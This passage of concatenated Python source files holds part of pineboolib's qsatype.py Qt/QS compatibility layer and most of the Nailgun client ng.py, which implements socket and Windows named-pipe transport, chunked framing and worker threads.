sys_idx = handle_cmd(sys_idx, method, params)
except Exception as e:
print(e)
continue
if __name__ == "__main__":
start_server_async()
run_interactive()
|
qsatype.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
import datetime, weakref
from PyQt4 import QtCore, QtGui
# Load the whole Qt API so that it is visible.
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from pineboolib import qsaglobals
from pineboolib import flcontrols
from pineboolib.fllegacy import FLFormSearchDB as FLFormSearchDB_legacy
from pineboolib.flcontrols import FLTable, FLReportViewer, QLineEdit
from pineboolib.fllegacy import FLSqlQuery as FLSqlQuery_Legacy
from pineboolib.fllegacy import FLSqlCursor as FLSqlCursor_Legacy
from pineboolib.fllegacy import FLTableDB as FLTableDB_Legacy
from pineboolib.fllegacy import FLUtil as FLUtil_Legacy
from pineboolib import decorators
import traceback
class StructMyDict(dict):
def __getattr__(self, name):
try:
return self[name]
except KeyError as e:
raise AttributeError(e)
def __setattr__(self, name, value):
self[name] = value
def Function(args, source):
# Read the QS code embedded in source
# assume it is an anonymous function, i.e.:
# -> function($args) { source }
# compile the function and return a pointer to it
qs_source = """
function anon(%s) {
%s
} """ % (args,source)
print("Compilando QS en línea: ", qs_source)
from pineboolib.flparser import flscriptparse
from pineboolib.flparser import postparse
from pineboolib.flparser.pytnyzer import write_python_file, string_template
import io
prog = flscriptparse.parse(qs_source)
tree_data = flscriptparse.calctree(prog, alias_mode = 0)
ast = postparse.post_parse(tree_data)
tpl = string_template
f1 = io.StringIO()
write_python_file(f1,ast,tpl)
pyprog = f1.getvalue()
print("Resultado: ", pyprog)
glob = {}
loc = {}
exec(pyprog, glob, loc)
# ... and the worst part is that it works. W-T-F.
return loc["anon"]
def Object(x=None):
if x is None: x = {}
return StructMyDict(x)
def Array(x=None):
try:
if x is None: return {}
else: return list(x)
except TypeError:
return [x]
def Boolean(x=False): return bool(x)
def FLSqlQuery(*args):
#if not args: return None
return FLSqlQuery_Legacy.FLSqlQuery(*args)
def FLUtil(*args):
return FLUtil_Legacy.FLUtil(*args)
def AQUtil(*args):
return FLUtil_Legacy.FLUtil(*args)
def FLSqlCursor(action=None):
if action is None: return None
return FLSqlCursor_Legacy.FLSqlCursor(action)
def FLTableDB(*args):
if not args: return None
return FLTableDB_Legacy.FLTableDB(*args)
FLListViewItem = QtGui.QListView
QTable = FLTable
Color = QtGui.QColor
QColor = QtGui.QColor
QDateEdit = QtGui.QDateEdit
File = QtCore.QFile
@decorators.NotImplementedWarn
def FLPosPrinter(*args, **kwargs):
class flposprinter:
pass
return flposprinter()
@decorators.NotImplementedWarn
def FLDomDocument(*args, **kwargs):
class fldomdocument:
pass
return fldomdocument()
@decorators.NotImplementedWarn
def FLCodBar(*args, **kwargs):
class flcodbar:
def nameToType(self, name):
return name
def pixmapError(self):
return QtGui.QPixmap()
def pixmap(self):
return QtGui.QPixmap()
def validBarcode(self):
return None
return flcodbar()
def print_stack(maxsize=1):
for tb in traceback.format_list(traceback.extract_stack())[1:-2][-maxsize:]:
print(tb.rstrip())
def check_gc_referrers(typename, w_obj, name):
import threading, time
def checkfn():
import gc
time.sleep(2)
gc.collect()
obj = w_obj()
if not obj: return
# TODO: If you see the message below, it means that "something" has kept
# ..... a reference to a form (or similar) that prevents it from being destroyed
# ..... once it is no longer used, so its connects are not destroyed either
# ..... and they keep being invoked against the old code and failing.
print("HINT: Objetos referenciando %r::%r (%r) :" % (typename, obj, name))
for ref in gc.get_referrers(obj):
if isinstance(ref, dict):
x = []
for k,v in ref.items():
if v is obj:
k = "(**)" + k
x.insert(0,k)
else:
x.append(k)
print(" - ", repr(x[:48]))
else:
if "<frame" in str(repr(ref)): continue
print(" - ", repr(ref))
threading.Thread(target = checkfn).start()
class FormDBWidget(QtGui.QWidget):
def __init__(self, action, project, parent = None):
super(FormDBWidget, self).__init__(parent)
self._action = action
self.cursor_ = FLSqlCursor(action.name)
self._prj = project
self._class_init()
def __del__(self):
print("FormDBWidget: Borrando form para accion %r" % self._action.name)
def _class_init(self):
pass
def closeEvent(self, event):
can_exit = True
print("FormDBWidget: closeEvent para accion %r" % self._action.name)
check_gc_referrers("FormDBWidget:"+self.__class__.__name__, weakref.ref(self), self._action.name)
if hasattr(self, 'iface'):
check_gc_referrers("FormDBWidget.iface:"+self.iface.__class__.__name__, weakref.ref(self.iface), self._action.name)
del self.iface.ctx
del self.iface
if can_exit:
event.accept() # let the window close
else:
event.ignore()
def child(self, childName):
try:
ret = self.findChild(QtGui.QWidget, childName)
except RuntimeError as rte:
# FIXME: Sometimes a control is looked up while it is already being deleted.
# ... apparently, closing the form does not disconnect its signals.
print("ERROR: Al buscar el control %r encontramos el error %r" % (childName,rte))
print_stack(8)
import gc
gc.collect()
print("HINT: Objetos referenciando FormDBWidget::%r (%r) : %r" % (self, self._action.name, gc.get_referrers(self)))
if hasattr(self, 'iface'):
print("HINT: Objetos referenciando FormDBWidget.iface::%r : %r" % (self.iface, gc.get_referrers(self.iface)))
ret = None
else:
if ret is None:
print("WARN: No se encontró el control %r" % childName)
#else:
# print("DEBUG: Encontrado el control %r: %r" % (childName, ret))
return ret
def cursor(self):
cursor = None
try:
if self.parentWidget():
cursor = getattr(self.parentWidget(),"cursor_", None)
if cursor:
del self.cursor_
self.cursor_ = cursor
except Exception:
# FIXME: Sometimes parentWidget existed but has already been deleted, raising an error.
# ... in principle it should be safe to ignore that error.
pass
return self.cursor_
def FLFormSearchDB(name):
widget = FLFormSearchDB_legacy.FLFormSearchDB(name)
widget.setWindowModality(QtCore.Qt.ApplicationModal)
return widget
class Date(QtCore.QDate):
pass
class Dialog(QtGui.QDialog):
_layout = None
def __init__(self, title, f):
# FIXME: f is not used here; it is the Qt window flags argument.
super(Dialog, self).__init__()
self.setWindowTitle(title)
self.setWindowModality(QtCore.Qt.ApplicationModal)
self._layout = QtGui.QVBoxLayout()
self.setLayout(self._layout)
def add(self, _object):
self._layout.addWidget(_object)
class GroupBox(QtGui.QGroupBox):
pass
class CheckBox(QtGui.QCheckBox):
pass
|
ng.py
|
#!/usr/bin/env python
#
# Copyright 2004-2015, Martian Software, Inc.
# Copyright 2017-Present Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import ctypes
import platform
import optparse
import os
import os.path
import select
import socket
import struct
import sys
import time
from io import BytesIO
from threading import Condition, Event, Thread, RLock
is_py2 = sys.version_info[0] == 2
if is_py2:
import Queue as Queue
import __builtin__ as builtin
def to_bytes(s):
return s
else:
import queue as Queue
import builtins as builtin
from io import UnsupportedOperation
def to_bytes(s):
return bytes(s, "utf-8")
if sys.platform == "win32":
import os, msvcrt
msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
msvcrt.setmode(sys.stderr.fileno(), os.O_BINARY)
# @author <a href="http://www.martiansoftware.com/contact.html">Marty Lamb</a>
# @author Pete Kirkham (Win32 port)
# @author Sergey Balabanov, Ben Hamilton (Python port)
#
# Please try to keep this working on Python 2.6.
NAILGUN_VERSION = "1.0.0"
BUFSIZE = 2048
NAILGUN_PORT_DEFAULT = 2113
CHUNK_HEADER_LEN = 5
THREAD_TERMINATION_TIMEOUT_SEC = 0.5
STDIN_BUFFER_LINE_SIZE = 10
CHUNKTYPE_STDIN = b"0"
CHUNKTYPE_STDOUT = b"1"
CHUNKTYPE_STDERR = b"2"
CHUNKTYPE_STDIN_EOF = b"."
CHUNKTYPE_ARG = b"A"
CHUNKTYPE_LONGARG = b"L"
CHUNKTYPE_ENV = b"E"
CHUNKTYPE_DIR = b"D"
CHUNKTYPE_CMD = b"C"
CHUNKTYPE_EXIT = b"X"
CHUNKTYPE_SENDINPUT = b"S"
CHUNKTYPE_HEARTBEAT = b"H"
NSEC_PER_SEC = 1000000000
DEFAULT_HEARTBEAT_INTERVAL_SEC = 0.5
SELECT_MAX_BLOCK_TIME_SEC = 1.0
SEND_THREAD_WAIT_TERMINATION_SEC = 5.0
# We need to support Python 2.6 hosts which lack memoryview().
HAS_MEMORYVIEW = "memoryview" in dir(builtin)
EVENT_STDIN_CHUNK = 0
EVENT_STDIN_CLOSED = 1
EVENT_STDIN_EXCEPTION = 2
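# --- Framing note (derived from the send/receive code below) ---
# Every chunk on the wire is a 5-byte header -- a 4-byte big-endian payload
# length plus a 1-byte chunk type, packed with struct format ">ic" -- followed
# by the payload itself, e.g. struct.pack(">ic", 5, CHUNKTYPE_CMD) + b"hello".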
def compat_memoryview_py2(buf):
return memoryview(buf)
def compat_memoryview_py3(buf):
return memoryview(buf).cast("c")
# memoryview in python3, while wrapping ctypes.create_string_buffer has problems with
# that type's default format (<c) and assignment operators. For python3, cast to
# a 'c' array. Little endian single byte doesn't make sense anyways. However,
# 'cast' does not exist for python2. So, we have to toggle a bit.
compat_memoryview = compat_memoryview_py2 if is_py2 else compat_memoryview_py3
class NailgunException(Exception):
SOCKET_FAILED = 231
CONNECT_FAILED = 230
UNEXPECTED_CHUNKTYPE = 229
CONNECTION_BROKEN = 227
def __init__(self, message, code):
self.message = message
self.code = code
def __str__(self):
return self.message
class Transport(object):
def close(self):
raise NotImplementedError()
def sendall(self, data):
raise NotImplementedError()
def recv(self, size):
raise NotImplementedError()
def recv_into(self, buffer, size=None):
raise NotImplementedError()
def select(self, timeout_secs):
raise NotImplementedError()
class UnixTransport(Transport):
def __init__(self, __socket):
self.__socket = __socket
self.recv_flags = 0
self.send_flags = 0
if hasattr(socket, "MSG_WAITALL"):
self.recv_flags |= socket.MSG_WAITALL
if hasattr(socket, "MSG_NOSIGNAL"):
self.send_flags |= socket.MSG_NOSIGNAL
def close(self):
return self.__socket.close()
def sendall(self, data):
result = self.__socket.sendall(data, self.send_flags)
return result
def recv(self, nbytes):
return self.__socket.recv(nbytes, self.recv_flags)
def recv_into(self, buffer, nbytes=None):
return self.__socket.recv_into(buffer, nbytes, self.recv_flags)
def select(self, timeout_secs):
select_list = [self.__socket]
readable, _, exceptional = select.select(
select_list, [], select_list, timeout_secs
)
return (self.__socket in readable), (self.__socket in exceptional)
if os.name == "nt":
import ctypes.wintypes
wintypes = ctypes.wintypes
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
FILE_FLAG_OVERLAPPED = 0x40000000
OPEN_EXISTING = 3
INVALID_HANDLE_VALUE = ctypes.c_void_p(-1).value
FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000
FORMAT_MESSAGE_ALLOCATE_BUFFER = 0x00000100
FORMAT_MESSAGE_IGNORE_INSERTS = 0x00000200
WAIT_FAILED = 0xFFFFFFFF
WAIT_TIMEOUT = 0x00000102
WAIT_OBJECT_0 = 0x00000000
WAIT_IO_COMPLETION = 0x000000C0
INFINITE = 0xFFFFFFFF
# Overlapped I/O operation is in progress. (997)
ERROR_IO_PENDING = 0x000003E5
ERROR_PIPE_BUSY = 231
# No process is on the other end of the pipe error on Windows
ERROR_NO_PROCESS_ON_OTHER_END_OF_PIPE = 233
# The pointer size follows the architecture
# We use WPARAM since this type is already conditionally defined
ULONG_PTR = ctypes.wintypes.WPARAM
class OVERLAPPED(ctypes.Structure):
_fields_ = [
("Internal", ULONG_PTR),
("InternalHigh", ULONG_PTR),
("Offset", wintypes.DWORD),
("OffsetHigh", wintypes.DWORD),
("hEvent", wintypes.HANDLE),
]
LPDWORD = ctypes.POINTER(wintypes.DWORD)
CreateFile = ctypes.windll.kernel32.CreateFileW
CreateFile.argtypes = [
wintypes.LPCWSTR,
wintypes.DWORD,
wintypes.DWORD,
wintypes.LPVOID,
wintypes.DWORD,
wintypes.DWORD,
wintypes.HANDLE,
]
CreateFile.restype = wintypes.HANDLE
CloseHandle = ctypes.windll.kernel32.CloseHandle
CloseHandle.argtypes = [wintypes.HANDLE]
CloseHandle.restype = wintypes.BOOL
ReadFile = ctypes.windll.kernel32.ReadFile
ReadFile.argtypes = [
wintypes.HANDLE,
wintypes.LPVOID,
wintypes.DWORD,
LPDWORD,
ctypes.POINTER(OVERLAPPED),
]
ReadFile.restype = wintypes.BOOL
WriteFile = ctypes.windll.kernel32.WriteFile
WriteFile.argtypes = [
wintypes.HANDLE,
wintypes.LPVOID,
wintypes.DWORD,
LPDWORD,
ctypes.POINTER(OVERLAPPED),
]
WriteFile.restype = wintypes.BOOL
GetLastError = ctypes.windll.kernel32.GetLastError
GetLastError.argtypes = []
GetLastError.restype = wintypes.DWORD
SetLastError = ctypes.windll.kernel32.SetLastError
SetLastError.argtypes = [wintypes.DWORD]
SetLastError.restype = None
FormatMessage = ctypes.windll.kernel32.FormatMessageW
FormatMessage.argtypes = [
wintypes.DWORD,
wintypes.LPVOID,
wintypes.DWORD,
wintypes.DWORD,
ctypes.POINTER(wintypes.LPCWSTR),
wintypes.DWORD,
wintypes.LPVOID,
]
FormatMessage.restype = wintypes.DWORD
LocalFree = ctypes.windll.kernel32.LocalFree
GetOverlappedResult = ctypes.windll.kernel32.GetOverlappedResult
GetOverlappedResult.argtypes = [
wintypes.HANDLE,
ctypes.POINTER(OVERLAPPED),
LPDWORD,
wintypes.BOOL,
]
GetOverlappedResult.restype = wintypes.BOOL
CreateEvent = ctypes.windll.kernel32.CreateEventW
CreateEvent.argtypes = [LPDWORD, wintypes.BOOL, wintypes.BOOL, wintypes.LPCWSTR]
CreateEvent.restype = wintypes.HANDLE
PeekNamedPipe = ctypes.windll.kernel32.PeekNamedPipe
PeekNamedPipe.argtypes = [
wintypes.HANDLE,
wintypes.LPVOID,
wintypes.DWORD,
LPDWORD,
LPDWORD,
LPDWORD,
]
PeekNamedPipe.restype = wintypes.BOOL
WaitNamedPipe = ctypes.windll.kernel32.WaitNamedPipeW
WaitNamedPipe.argtypes = [wintypes.LPCWSTR, wintypes.DWORD]
WaitNamedPipe.restype = wintypes.BOOL
def _win32_strerror(err):
""" expand a win32 error code into a human readable message """
# FormatMessage will allocate memory and assign it here
buf = ctypes.c_wchar_p()
FormatMessage(
FORMAT_MESSAGE_FROM_SYSTEM
| FORMAT_MESSAGE_ALLOCATE_BUFFER
| FORMAT_MESSAGE_IGNORE_INSERTS,
None,
err,
0,
buf,
0,
None,
)
try:
return buf.value
finally:
LocalFree(buf)
class WindowsNamedPipeTransport(Transport):
""" connect to a named pipe """
def __init__(self, sockpath):
self.sockpath = u"\\\\.\\pipe\\{0}".format(sockpath)
while True:
self.pipe = CreateFile(
self.sockpath,
GENERIC_READ | GENERIC_WRITE,
0,
None,
OPEN_EXISTING,
FILE_FLAG_OVERLAPPED,
None,
)
err1 = GetLastError()
msg = _win32_strerror(err1)
if self.pipe != INVALID_HANDLE_VALUE:
break
if err1 != ERROR_PIPE_BUSY:
self.pipe = None
raise NailgunException(msg, NailgunException.CONNECT_FAILED)
if not WaitNamedPipe(self.sockpath, 5000):
self.pipe = None
raise NailgunException(
"time out while waiting for a pipe", NailgunException.CONNECT_FAILED
)
# event for the overlapped I/O operations
self.read_waitable = CreateEvent(None, True, False, None)
if self.read_waitable is None:
raise NailgunException(
"CreateEvent failed", NailgunException.CONNECT_FAILED
)
self.write_waitable = CreateEvent(None, True, False, None)
if self.write_waitable is None:
raise NailgunException(
"CreateEvent failed", NailgunException.CONNECT_FAILED
)
def _raise_win_err(self, msg, err):
raise IOError("%s win32 error code: %d %s" % (msg, err, _win32_strerror(err)))
def close(self):
if self.pipe:
CloseHandle(self.pipe)
self.pipe = None
if self.read_waitable is not None:
CloseHandle(self.read_waitable)
self.read_waitable = None
if self.write_waitable is not None:
CloseHandle(self.write_waitable)
self.write_waitable = None
def recv_into(self, buffer, nbytes):
# we don't use memoryview because OVERLAPPED I/O happens
# after the method (ReadFile) returns
buf = ctypes.create_string_buffer(nbytes)
olap = OVERLAPPED()
olap.hEvent = self.read_waitable
immediate = ReadFile(self.pipe, buf, nbytes, None, olap)
err = GetLastError()
if err == ERROR_NO_PROCESS_ON_OTHER_END_OF_PIPE:
raise NailgunException(
"No process on the other end of pipe",
NailgunException.CONNECTION_BROKEN,
)
if not immediate:
if err != ERROR_IO_PENDING:
self._raise_win_err("failed to read %d bytes" % nbytes, GetLastError())
nread = wintypes.DWORD()
if not GetOverlappedResult(self.pipe, olap, nread, True):
err = GetLastError()
self._raise_win_err("error while waiting for read", err)
nread = nread.value
if not is_py2:
# Wrap in a memoryview, as python3 does not let you assign from a
# ctypes.c_char_array slice directly to a memory view, as one is 'c', and one
# is '<c' struct/buffer proto format.
buf = compat_memoryview(buf)
buffer[:nread] = buf[:nread]
return nread
def sendall(self, data):
olap = OVERLAPPED()
olap.hEvent = self.write_waitable
p = (ctypes.c_ubyte * len(data))(*(bytearray(data)))
immediate = WriteFile(self.pipe, p, len(data), None, olap)
if not immediate:
err = GetLastError()
if err != ERROR_IO_PENDING:
self._raise_win_err(
"failed to write %d bytes" % len(data), GetLastError()
)
# Obtain results, waiting if needed
nwrote = wintypes.DWORD()
if not GetOverlappedResult(self.pipe, olap, nwrote, True):
err = GetLastError()
self._raise_win_err("error while waiting for write", err)
nwrote = nwrote.value
if nwrote != len(data):
raise IOError("Async wrote less bytes!")
return nwrote
def select(self, timeout_secs):
start = monotonic_time_nanos()
timeout_nanos = timeout_secs * NSEC_PER_SEC
while True:
readable, exceptional = self.select_now()
if (
readable
or exceptional
or monotonic_time_nanos() - start > timeout_nanos
):
return readable, exceptional
# Sleep a bit to avoid busy looping for no reason.
time.sleep(0.05)
def select_now(self):
available_total = wintypes.DWORD()
exceptional = not PeekNamedPipe(self.pipe, None, 0, None, available_total, None)
readable = available_total.value > 0
result = readable, exceptional
return result
class NailgunConnection(object):
"""Stateful object holding the connection to the Nailgun server."""
def __init__(
self,
server_name,
server_port=None,
stdin=sys.stdin,
stdout=sys.stdout,
stderr=sys.stderr,
cwd=None,
heartbeat_interval_sec=DEFAULT_HEARTBEAT_INTERVAL_SEC,
):
self.transport = make_nailgun_transport(server_name, server_port, cwd)
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
self.recv_flags = 0
self.send_flags = 0
self.header_buf = ctypes.create_string_buffer(CHUNK_HEADER_LEN)
self.buf = ctypes.create_string_buffer(BUFSIZE)
self.exit_code = None
self.shutdown_event = Event()
self.error_lock = RLock()
self.error = None
self.error_traceback = None
self.stdin_condition = Condition()
self.stdin_thread = Thread(target=stdin_thread_main, args=(self,))
self.stdin_thread.daemon = True
self.send_queue = Queue.Queue()
self.send_condition = Condition()
self.send_thread = Thread(target=send_thread_main, args=(self,))
self.send_thread.daemon = True
self.heartbeat_interval_sec = heartbeat_interval_sec
self.heartbeat_condition = Condition()
self.heartbeat_thread = None
if heartbeat_interval_sec > 0:
self.heartbeat_thread = Thread(target=heartbeat_thread_main, args=(self,))
self.heartbeat_thread.daemon = True
def send_command(
self, cmd, cmd_args=[], filearg=None, env=os.environ, cwd=os.getcwd()
):
"""
Sends the command and environment to the nailgun server, then loops forever
reading the response until the server sends an exit chunk.
Returns the exit value, or raises NailgunException on error.
"""
try:
return self._send_command_and_read_response(
cmd, cmd_args, filearg, env, cwd
)
except socket.error as e:
re_raise(
NailgunException(
"Server disconnected unexpectedly: {0}".format(e),
NailgunException.CONNECTION_BROKEN,
)
)
def _send_command_and_read_response(self, cmd, cmd_args, filearg, env, cwd):
self.stdin_thread.start()
self.send_thread.start()
try:
if filearg:
self._send_file_arg(filearg)
for cmd_arg in cmd_args:
self._send_chunk(cmd_arg, CHUNKTYPE_ARG)
self._send_env_var("NAILGUN_FILESEPARATOR", os.sep)
self._send_env_var("NAILGUN_PATHSEPARATOR", os.pathsep)
self._send_tty_format(self.stdin)
self._send_tty_format(self.stdout)
self._send_tty_format(self.stderr)
for k, v in env.items():
self._send_env_var(k, v)
self._send_chunk(cwd, CHUNKTYPE_DIR)
self._send_chunk(cmd, CHUNKTYPE_CMD)
if self.heartbeat_thread is not None:
self.heartbeat_thread.start()
while self.exit_code is None:
self._process_next_chunk()
finally:
self.shutdown_event.set()
with self.stdin_condition:
self.stdin_condition.notify()
with self.send_condition:
self.send_condition.notify()
if self.heartbeat_thread is not None:
with self.heartbeat_condition:
self.heartbeat_condition.notify()
self.heartbeat_thread.join(THREAD_TERMINATION_TIMEOUT_SEC)
self.stdin_thread.join(THREAD_TERMINATION_TIMEOUT_SEC)
self.send_thread.join(THREAD_TERMINATION_TIMEOUT_SEC)
return self.exit_code
def _process_next_chunk(self):
"""
Processes the next chunk from the nailgun server.
"""
readable, exceptional = self.transport.select(SELECT_MAX_BLOCK_TIME_SEC)
if readable:
self._process_nailgun_stream()
if exceptional:
raise NailgunException(
"Server disconnected in select", NailgunException.CONNECTION_BROKEN
)
# if daemon thread threw, rethrow here
if self.shutdown_event.is_set():
e = None
e_tb = None
with self.error_lock:
e = self.error
e_tb = self.error_traceback
if e is not None:
re_raise(e, e_tb)
def _send_chunk(self, buf, chunk_type):
"""
Send chunk to the server asynchronously
"""
self.send_queue.put((chunk_type, buf))
with self.send_condition:
self.send_condition.notify()
def _send_env_var(self, name, value):
"""
Sends an environment variable in KEY=VALUE format.
"""
self._send_chunk("=".join((name, value)), CHUNKTYPE_ENV)
def _send_tty_format(self, f):
"""
Sends a NAILGUN_TTY_# environment variable.
"""
if not f or not hasattr(f, "fileno") or isinstance(f, BytesIO):
return
try:
fileno = f.fileno()
isatty = os.isatty(fileno)
self._send_env_var("NAILGUN_TTY_" + str(fileno), str(int(isatty)))
except UnsupportedOperation:
return
def _send_file_arg(self, filename):
"""
Sends the contents of a file to the server.
"""
with open(filename) as f:
while True:
num_bytes = f.readinto(self.buf)
if not num_bytes:
break
self._send_chunk(self.buf.raw[:num_bytes], CHUNKTYPE_LONGARG)
def _recv_to_fd(self, dest_file, num_bytes):
"""
Receives num_bytes bytes from the nailgun socket and copies them to the specified file
object. Used to route data to stdout or stderr on the client.
"""
bytes_read = 0
dest_fd = dest_file
flush = False
if dest_file and hasattr(dest_file, 'buffer'):
dest_fd = dest_file.buffer
flush = True
# Make sure we've written anything that already existed in the buffer
dest_fd.flush()
while bytes_read < num_bytes:
bytes_to_read = min(len(self.buf), num_bytes - bytes_read)
bytes_received = self.transport.recv_into(self.buf, bytes_to_read)
if dest_fd:
dest_fd.write(self.buf[:bytes_received])
if flush:
dest_fd.flush()
bytes_read += bytes_received
def _recv_to_buffer(self, num_bytes, buf):
"""
Receives num_bytes from the nailgun socket and writes them into the specified buffer.
"""
# We'd love to use socket.recv_into() everywhere to avoid
# unnecessary copies, but we need to support Python 2.6. The
# only way to provide an offset to recv_into() is to use
# memoryview(), which doesn't exist until Python 2.7.
if HAS_MEMORYVIEW:
self._recv_into_memoryview(num_bytes, compat_memoryview(buf))
else:
self._recv_to_buffer_with_copy(num_bytes, buf)
def _recv_into_memoryview(self, num_bytes, buf_view):
"""
Receives num_bytes from the nailgun socket and writes them into the specified memoryview
to avoid an extra copy.
"""
bytes_read = 0
while bytes_read < num_bytes:
bytes_received = self.transport.recv_into(
buf_view[bytes_read:], num_bytes - bytes_read
)
if not bytes_received:
raise NailgunException(
"Server unexpectedly disconnected in recv_into()",
NailgunException.CONNECTION_BROKEN,
)
bytes_read += bytes_received
def _recv_to_buffer_with_copy(self, num_bytes, buf):
"""
Receives num_bytes from the nailgun socket and writes them into the specified buffer.
"""
bytes_read = 0
while bytes_read < num_bytes:
recv_buf = self.transport.recv(num_bytes - bytes_read)
if not len(recv_buf):
raise NailgunException(
"Server unexpectedly disconnected in recv()",
NailgunException.CONNECTION_BROKEN,
)
buf[bytes_read : bytes_read + len(recv_buf)] = recv_buf
bytes_read += len(recv_buf)
def _process_exit(self, exit_len):
"""
Receives an exit code from the nailgun server and sets nailgun_connection.exit_code
to indicate the client should exit.
"""
num_bytes = min(len(self.buf), exit_len)
self._recv_to_buffer(num_bytes, self.buf)
self.exit_code = int(self.buf.raw[:num_bytes])
def _send_heartbeat(self):
"""
Sends a heartbeat to the nailgun server to indicate the client is still alive.
"""
self._send_chunk("", CHUNKTYPE_HEARTBEAT)
def _process_nailgun_stream(self):
"""
Processes a single chunk from the nailgun server.
"""
self._recv_to_buffer(len(self.header_buf), self.header_buf)
(chunk_len, chunk_type) = struct.unpack_from(">ic", self.header_buf.raw)
if chunk_type == CHUNKTYPE_STDOUT:
self._recv_to_fd(self.stdout, chunk_len)
elif chunk_type == CHUNKTYPE_STDERR:
self._recv_to_fd(self.stderr, chunk_len)
elif chunk_type == CHUNKTYPE_EXIT:
self._process_exit(chunk_len)
elif chunk_type == CHUNKTYPE_SENDINPUT:
# signal stdin thread to get and send more data
with self.stdin_condition:
self.stdin_condition.notify()
else:
raise NailgunException(
"Unexpected chunk type: {0}".format(chunk_type),
NailgunException.UNEXPECTED_CHUNKTYPE,
)
def wait_termination(self, timeout):
"""
Wait for shutdown event to be signalled within specified interval
Return True if termination was signalled, False otherwise
"""
wait_time = timeout
start = monotonic_time_nanos()
with self.send_condition:
while True:
if self.shutdown_event.is_set():
return True
self.send_condition.wait(wait_time)
elapsed = (monotonic_time_nanos() - start) * 1.0 / NSEC_PER_SEC
wait_time = timeout - elapsed
if wait_time <= 0:
return False
return False
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
try:
self.transport.close()
except socket.error:
pass
def monotonic_time_nanos():
"""Returns a monotonically-increasing timestamp value in nanoseconds.
The epoch of the return value is undefined. To use this, you must call
it more than once and calculate the delta between two calls.
"""
# This function should be overwritten below on supported platforms.
raise Exception("Unsupported platform: " + platform.system())
if platform.system() == "Linux":
# From <linux/time.h>, available since 2.6.28 (released 24-Dec-2008).
CLOCK_MONOTONIC_RAW = 4
librt = ctypes.CDLL("librt.so.1", use_errno=True)
clock_gettime = librt.clock_gettime
class struct_timespec(ctypes.Structure):
_fields_ = [("tv_sec", ctypes.c_long), ("tv_nsec", ctypes.c_long)]
clock_gettime.argtypes = [ctypes.c_int, ctypes.POINTER(struct_timespec)]
def _monotonic_time_nanos_linux():
t = struct_timespec()
clock_gettime(CLOCK_MONOTONIC_RAW, ctypes.byref(t))
return t.tv_sec * NSEC_PER_SEC + t.tv_nsec
monotonic_time_nanos = _monotonic_time_nanos_linux
elif platform.system() == "Darwin":
# From <mach/mach_time.h>
KERN_SUCCESS = 0
libSystem = ctypes.CDLL("/usr/lib/libSystem.dylib", use_errno=True)
mach_timebase_info = libSystem.mach_timebase_info
class struct_mach_timebase_info(ctypes.Structure):
_fields_ = [("numer", ctypes.c_uint32), ("denom", ctypes.c_uint32)]
mach_timebase_info.argtypes = [ctypes.POINTER(struct_mach_timebase_info)]
mach_ti = struct_mach_timebase_info()
ret = mach_timebase_info(ctypes.byref(mach_ti))
if ret != KERN_SUCCESS:
raise Exception("Could not get mach_timebase_info, error: " + str(ret))
mach_absolute_time = libSystem.mach_absolute_time
mach_absolute_time.restype = ctypes.c_uint64
def _monotonic_time_nanos_darwin():
return (mach_absolute_time() * mach_ti.numer) / mach_ti.denom
monotonic_time_nanos = _monotonic_time_nanos_darwin
elif platform.system() == "Windows":
# From <Winbase.h>
perf_frequency = ctypes.c_uint64()
ctypes.windll.kernel32.QueryPerformanceFrequency(ctypes.byref(perf_frequency))
def _monotonic_time_nanos_windows():
perf_counter = ctypes.c_uint64()
ctypes.windll.kernel32.QueryPerformanceCounter(ctypes.byref(perf_counter))
return perf_counter.value * NSEC_PER_SEC / perf_frequency.value
monotonic_time_nanos = _monotonic_time_nanos_windows
elif sys.platform == "cygwin":
k32 = ctypes.CDLL("Kernel32", use_errno=True)
perf_frequency = ctypes.c_uint64()
k32.QueryPerformanceFrequency(ctypes.byref(perf_frequency))
def _monotonic_time_nanos_cygwin():
perf_counter = ctypes.c_uint64()
k32.QueryPerformanceCounter(ctypes.byref(perf_counter))
return perf_counter.value * NSEC_PER_SEC / perf_frequency.value
monotonic_time_nanos = _monotonic_time_nanos_cygwin
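# --- Usage sketch for monotonic_time_nanos() (illustration only) ---
# The returned value has no defined epoch; only the difference between two
# calls is meaningful:
#   start = monotonic_time_nanos()
#   ...do some work...
#   elapsed_sec = (monotonic_time_nanos() - start) / float(NSEC_PER_SEC)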
def send_thread_main(conn):
"""
Sending thread worker function
Waits for data and transmits it to server
"""
try:
header_buf = ctypes.create_string_buffer(CHUNK_HEADER_LEN)
while True:
connection_error = None
while not conn.send_queue.empty():
# only this thread can deplete the queue, so it is safe to use blocking get()
(chunk_type, buf) = conn.send_queue.get()
bbuf = to_bytes(buf)
struct.pack_into(">ic", header_buf, 0, len(bbuf), chunk_type)
# these chunk types are not required for server to accept and process and server may terminate
# any time without waiting for them
is_required = chunk_type not in (
CHUNKTYPE_HEARTBEAT,
CHUNKTYPE_STDIN,
CHUNKTYPE_STDIN_EOF,
)
try:
conn.transport.sendall(header_buf.raw)
conn.transport.sendall(bbuf)
except socket.error as e:
# The server may send termination signal and close the socket immediately; attempt to write
# to such a socket (i.e. heartbeats) results in an error (SIGPIPE)
# Nailgun protocol is not duplex so the server does not wait on client to acknowledge
# We catch an exception and ignore it if termination has happened shortly afterwards
if not is_required and conn.wait_termination(
SEND_THREAD_WAIT_TERMINATION_SEC
):
return
raise
with conn.send_condition:
if conn.shutdown_event.is_set():
return
if not conn.send_queue.empty():
continue
conn.send_condition.wait()
if conn.shutdown_event.is_set():
return
except Exception as e:
# save exception to rethrow on main thread
with conn.error_lock:
conn.error = e
conn.error_traceback = sys.exc_info()[2]
conn.shutdown_event.set()
def stdin_thread_main(conn):
"""
Stdin thread reading worker function
If stdin is available, read it to internal buffer and send to server
"""
try:
eof = False
while True:
# wait for signal to read new line from stdin or shutdown
